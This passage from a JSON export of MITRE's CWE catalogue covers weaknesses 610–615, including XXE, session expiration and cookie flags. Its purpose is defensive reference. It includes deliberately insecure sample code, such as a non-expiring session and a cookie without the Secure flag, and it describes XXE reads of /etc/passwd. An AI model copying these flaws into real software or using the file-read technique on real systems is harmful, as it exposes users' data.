idiom"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP19","Entry_Name":"Missing Lock"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-490"}},{"attr":{"@_External_Reference_ID":"REF-491"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 13, "Threading Vulnerabilities", Page 815"}}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Context_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Double Checked Locking","attr":{"@_Date":"2008-04-11"}}}},"610":{"attr":{"@_ID":"610","@_Name":"Externally Controlled Reference to a Resource in Another Sphere","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses an externally controlled name or reference that resolves to a resource that is outside of the intended control sphere.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"219"}}},"Notes":{"Note":[{"#text":"This is a general class of weakness, but most research is focused on more specialized cases, such as path traversal (CWE-22) and symlink following (CWE-61). A symbolic link has a name; in general, it appears like any other file in the file system. However, the link includes a reference to another file, often in another directory - perhaps in another sphere of control. Many common library functions that accept filenames will \\"follow\\" a symbolic link and use the link\'s target instead.","attr":{"@_Type":"Relationship"}},{"#text":"The relationship between CWE-99 and CWE-610 needs further investigation and clarification. They might be duplicates. CWE-99 \\"Resource Injection,\\" as originally defined in Seven Pernicious Kingdoms taxonomy, emphasizes the \\"identifier used to access a system resource\\" such as a file name or port number, yet it explicitly states that the \\"resource injection\\" term does not apply to \\"path manipulation,\\" which effectively identifies the path at which a resource can be found and could be considered to be one aspect of a resource identifier. Also, CWE-610 effectively covers any type of resource, whether that resource is at the system layer, the application layer, or the code layer.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Externally Controlled Reference to an Internal Resource","attr":{"@_Date":"2008-04-11"}}}},"611":{"attr":{"@_ID":"611","@_Name":"Improper Restriction of XML External Entity Reference","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output.","Extended_Description":{"xhtml:p":["XML documents optionally contain a Document Type Definition (DTD), which, among other features, enables the definition of XML entities. It is possible to define an entity by providing a substitution string in the form of a URI. The XML parser can access the contents of this URI and embed these contents back into the XML document for further processing.","By submitting an XML file that defines an external entity with a file:// URI, an attacker can cause the processing application to read the contents of a local file. For example, a URI such as \\"file:///c:/winnt/win.ini\\" designates (in Windows) the file C:\\\\Winnt\\\\win.ini, or file:///etc/passwd designates the password file in Unix-based systems. Using URIs with other schemes such as http://, the attacker can force the application to make outgoing requests to servers that the attacker cannot reach directly, which can be used to bypass firewall restrictions or hide the source of attacks such as port scanning.","Once the content of the URI is read, it is fed back into the application that is processing the XML. This application may echo back the data (e.g. in an error message), thereby exposing the file contents."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"441","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"XML","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"XXE","Description":"XXE is an acronym used for the term \\"XML eXternal Entities\\""}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Application Data","Read Files or Directories"],"Note":"If the attacker is able to include a crafted DTD and a default entity resolver is enabled, the attacker may be able to access arbitrary files on the system."},{"Scope":"Integrity","Impact":"Bypass Protection Mechanism","Note":"The DTD may include arbitrary HTTP requests that the server may execute. This could lead to other attacks leveraging the server\'s trust relationship with other entities."},{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"The software could consume excessive CPU cycles or memory using a URI that points to a large file, or a device that always returns data such as /dev/random. Alternately, the URI could reference a file that contains many nested or recursive entity references to further slow down parsing."}]},"Potential_Mitigations":{"Mitigation":{"Phase":["Implementation","System Configuration"],"Description":"Many XML parsers and validators can be configured to disable external entity expansion."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-1306","Description":"A browser control can allow remote attackers to determine the existence of files via Javascript containing XML script.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1306"},{"Reference":"CVE-2012-5656","Description":"XXE during SVG image conversion","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5656"},{"Reference":"CVE-2012-2239","Description":"XXE in PHP application allows reading the application\'s configuration file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2239"},{"Reference":"CVE-2012-3489","Description":"XXE in database server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3489"},{"Reference":"CVE-2012-4399","Description":"XXE in rapid web application development framework allows reading arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4399"},{"Reference":"CVE-2012-3363","Description":"XXE via XML-RPC request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3363"},{"Reference":"CVE-2012-0037","Description":"XXE in office document product using RDF.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0037"},{"Reference":"CVE-2011-4107","Description":"XXE in web-based administration tool for database.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4107"},{"Reference":"CVE-2010-3322","Description":"XXE in product that performs large-scale data analysis.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3322"},{"Reference":"CVE-2009-1699","Description":"XXE in XSL stylesheet functionality in a common library used by some web browsers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1699"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":43,"Entry_Name":"XML External Entities"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"221"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-496"}},{"attr":{"@_External_Reference_ID":"REF-497"}},{"attr":{"@_External_Reference_ID":"REF-498"}},{"attr":{"@_External_Reference_ID":"REF-499"}},{"attr":{"@_External_Reference_ID":"REF-500"}},{"attr":{"@_External_Reference_ID":"REF-501"}}]},"Notes":{"Note":{"#text":"CWE-918 (SSRF) and CWE-611 (XXE) are closely related, because they both involve web-related technologies and can launch outbound requests to unexpected destinations. However, XXE can be performed client-side, or in other contexts in which the software is not acting directly as a server, so the \\"Server\\" portion of the SSRF acronym does not necessarily apply.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Background_Details, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Background_Details, Common_Consequences, Description, Name, Observed_Examples, Potential_Mitigations, References, Relationship_Notes, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Name, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through XML External Entity File Disclosure","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through XML External Entity Reference","attr":{"@_Date":"2013-02-21"}},{"#text":"Improper Restriction of XML External Entity Reference (\'XXE\')","attr":{"@_Date":"2019-06-20"}}]}},"612":{"attr":{"@_ID":"612","@_Name":"Improper Authorization of Index Containing Sensitive Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product creates a search index of private or sensitive documents, but it does not properly limit index access to actors who are authorized to see the original information.","Extended_Description":"Web sites and other document repositories may apply an indexing routine against a group of private documents to facilitate search. If the index\'s results are available to parties who do not have access to the documents being indexed, then attackers could obtain portions of the documents by conducting targeted searches and reading the results. The risk is especially dangerous if search results include surrounding text that was not part of the search query. This issue can appear in search engines that are not configured (or implemented) to ignore critical files that should remain hidden; even without permissions to download these files directly, the remote user could read them.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1230","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":48,"Entry_Name":"Insecure Indexing"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1050"}}},"Notes":{"Note":{"#text":"This weakness is probably under-studied and under-reported","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, References, Relationships, Type"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Insecure Indexing","attr":{"@_Date":"2008-04-11"}},{"#text":"Information Leak Through Indexing of Private Data","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Indexing of Private Data","attr":{"@_Date":"2020-02-24"}}]}},"613":{"attr":{"@_ID":"613","@_Name":"Insufficient Session Expiration","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"According to WASC, \\"Insufficient Session Expiration is when a web site permits an attacker to reuse old session credentials or session IDs for authorization.\\"","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"287","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Set sessions/credentials expiration date."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following snippet was taken from a J2EE web.xml deployment descriptor in which the session-timeout parameter is explicitly defined (the default value depends on the container). In this case the value is set to -1, which means that a session will never expire.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"<web-app></web-app>","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"[...snipped...]<session-config></session-config>","xhtml:br":["",""],"xhtml:div":{"#text":"<session-timeout>-1</session-timeout>","attr":{"@_style":"margin-left:10px;"}}}}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":47,"Entry_Name":"Insufficient Session Expiration"}},"Notes":{"Note":{"#text":"The lack of proper session expiration may improve the likely success of certain attacks. For example, an attacker may intercept a session ID, possibly via a network sniffer or Cross-site Scripting attack. Although short session expiration times do not help if a stolen token is immediately used, they will protect against ongoing replaying of the session ID. In another scenario, a user might access a web site from a shared computer (such as at a library, Internet cafe, or open work environment). Insufficient Session Expiration could allow an attacker to use the browser\'s back button to access web pages previously accessed by the victim.","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"WASC","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"614":{"attr":{"@_ID":"614","@_Name":"Sensitive Cookie in HTTPS Session Without \'Secure\' Attribute","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The Secure attribute for sensitive cookies in HTTPS sessions is not set, which could cause the user agent to send those cookies in plaintext over an HTTP session.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"311","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Always set the secure attribute when the cookie should sent via HTTPS only."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The snippet of code below, taken from a servlet doPost() method, sets an accountID cookie (sensitive) without calling setSecure(true).","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Cookie c = new Cookie(ACCOUNT_ID, acctID);response.addCookie(c);","xhtml:br":""}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-0462","Description":"A product does not set the Secure attribute for sensitive cookies in HTTPS sessions, which could cause the user agent to send those cookies in plaintext over an HTTP session with the product.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0462"},{"Reference":"CVE-2008-3663","Description":"A product does not set the secure flag for the session cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3663"},{"Reference":"CVE-2008-3662","Description":"A product does not set the secure flag for the session cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3662"},{"Reference":"CVE-2008-0128","Description":"A product does not set the secure flag for a cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0128"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"102"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}],"Previous_Entry_Name":{"#text":"Unset Secure Attribute for Sensitive Cookies in HTTPS Session","attr":{"@_Date":"2008-04-11"}}}},"615":{"attr":{"@_ID":"615","@_Name":"Inclusion of Sensitive Information in Source Code Comments","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"While adding general comments is very useful, some programmers tend to leave important data, such as: filenames related to the web application, old links or links which were not meant to be browsed by users, old code fragments, etc.","Extended_Description":"An attacker who finds these comments can map the application\'s structure and files, expose hidden parts of the site, and study the fragments of code to reverse engineer the application, which may help develop further attacks against the site.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"540","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"546","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Distribution","Description":"Remove comments which have sensitive information about the design/implementation of the application. Some of the comments may be exposed to the user and affect the security posture of the application."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following comment, embedded in a JSP, will be displayed in the resulting HTML output.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"JSP"},"xhtml:div":"<!-- FIXME: calling this with more than 30 args kills the JDBC server -->"}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-6197","Description":"Version numbers and internal hostnames leaked in HTML comments.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6197"},{"Reference":"CVE-2007-4072","Description":"CMS places full pathname of server in HTML comment.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4072"},{"Reference":"CVE-2009-2431","Description":"blog software leaks real username in HTML comment.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2431"}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Observed_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content 